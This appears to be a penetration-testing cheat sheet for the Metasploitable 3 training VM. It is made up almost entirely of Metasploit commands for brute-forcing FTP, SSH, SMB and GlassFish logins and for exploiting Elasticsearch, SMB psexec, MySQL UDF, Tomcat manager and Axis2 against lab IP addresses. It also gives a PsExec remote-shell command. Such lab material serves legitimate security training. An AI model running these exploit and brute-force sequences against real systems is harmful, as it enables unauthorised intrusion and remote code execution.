nmap –p- -sV 192.168.1.8

# Note: CeWL is a command used to make a customized wordlist using a given URL.

FTP 21:
cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt
use auxiliary/scanner/ftp/ftp_login

msf exploit (ftp_login)>set username vagrant

msf exploit (ftp_login)>set rhosts 192.168.1.8

msf exploit (ftp_login)>set pass_file /root/Desktop/pass.txt

msf exploit (ftp_login)>set stop_on_success true

msf exploit (ftp_login)> exploit

-----------------------------------------------------------------------
Elasticsearch Exploit 9200 :
# Nmap shows a splendid result and in that result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.
use exploit/multi/elasticsearch/script_mvel_rce

msf exploit (script_mvel_rce)>set rhost 192.168.1.8

msf exploit (script_mvel_rce)>set rport 9200

msf exploit (script_mvel_rce)>exploit

-------------------------------------------------------------------------
Exploitation using Brute forcing SSH 22:

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/dict.txt
use auxiliary/scanner/ssh/ssh_login

msf auxiliary(ssh_login)>set rhosts 192.168.1.8

msf auxiliary (ssh_login)>set port 22

msf auxiliary (ssh_login)>set username vagrant

msf auxiliary(ssh_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary(ssh_login)>set stop_on_success true

msf auxiliary (ssh_login)> exploit
-------------------------------------------------------------------------------------
SMB Service Exploitation 445

cewl https://github.com/rapid/metasploitable3/wiki -m 7 -d 0 –w /root/Desktop/pass.txt

# First to get credential
use auxiliary/scanner/smb/smb_login

msf auxiliary (smb_login)>set rhosts 192.168.1.11

msf auxiliary (smb_login)>set rport 445

msf auxiliary (smb_login)>set smbuser vagrant

msf auxiliary (smb_login)>set pass_file /root/Desktop/pass.txt

msf auxiliary (smb_login)>set stop_on_success true

msf auxiliary (smb_login)> exploit

#Now for Attack

msf> use exploit/windows/smb/psexec

msf exploit (psexec)>set rhosts 192.168.1.11

msf exploit (psexec)>set rport 445

msf exploit (psexec)>set smbuser vagrant

msf exploit (psexec)>set smbpass vargrant

msf exploit (psexec)> exploit
----------------------------------------------------------------------------------

Mysql Service Exploitation 3306

# Let’s penetrate more inside it, use NESSUS for vulnerability analysis
# This module creates and enables a custom UDF (user defined function) on the target host via the SELECT … into DUMPFILE method of binary injection. 
On default Microsoft Windows installations of MySQL (=<5.5.9), directory write permissions not enforced, and the MySQL service runs as LocalSystem. 
NOTE: This module will leave a payload executable on the target system when the attack is finished, as well as the UDF DLL, and will define or redefine sys_eval() and sys_exec() functions.

msf > use exploit/windows/mysql/mysql_payload

msf exploit(mysql_payload) > set rhost 192.168.0.103

msf exploit(mysql_payload) > set rport 3306

msf exploit(mysql_payload) > exploit
---------------------------------------------------------------------------------

Glassfish Service

nmap –p- -A 192.168.1.14

msf > use auxiliary/scanner/http/glassfish_login

msf auxiliary(glassfish_login) > set rhosts 192.168.1.14

msf auxiliary(glassfish_login) > set rport 4848

msf auxiliary(glassfish_login) > set STOP_ON_SUCCESS true

msf auxiliary(glassfish_login) > set  user_file /root/Desktop/user.txt

msf auxiliary(glassfish_login) > set  pass_file /root/Desktop/pass.txt

msf auxiliary(glassfish_login) >exploit

#  After few attempt successfully we have our login for GLASSFISH as admin: sploit
---------------------------------------------------------------------------------------
SMB and Tomcat
nmap –p- -A 192.168.1.14

http://download.sysinternals.com/files/PSTools.zip.
PsExec.exe \\192.168.1.14 -u vagrant -p vagrant cmd

Type tomcat-users.xml

msf > use exploit/multi/http/tomcat_mgr_upload

msf exploit(tomcat_mgr_upload) > set rhost 192.168.1.14

msf exploit(tomcat_mgr_upload) > set rport 8282

msf exploit(tomcat_mgr_upload) > set HttpUsername sploit

msf exploit(tomcat_mgr_upload) > set HttpPassword sploit

msf exploit(tomcat_mgr_upload) > exploit
----------------------------------------------------------------
Another way to exploit your target
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using SOAP.

msf > use exploit/multi/http/axis2_deployer

msf exploit(axis2_deployer) > set rhost 192.168.1.8

msf exploit(axis2_deployer) > set rport 8282

msf exploit(axis2_deployer) >exploit

-------------------------------------------------------------------
































 DOS Attack:
https://www.hackingarticles.in/perform-dos-attack-metasploitable-3/
nmap -p-  -A 192.168.1.14
-------------------------------------------------------------------------
Manual Penetration Testing in Metasploitable 3
https://www.hackingarticles.in/manual-penetration-testing-metasploitable-3/
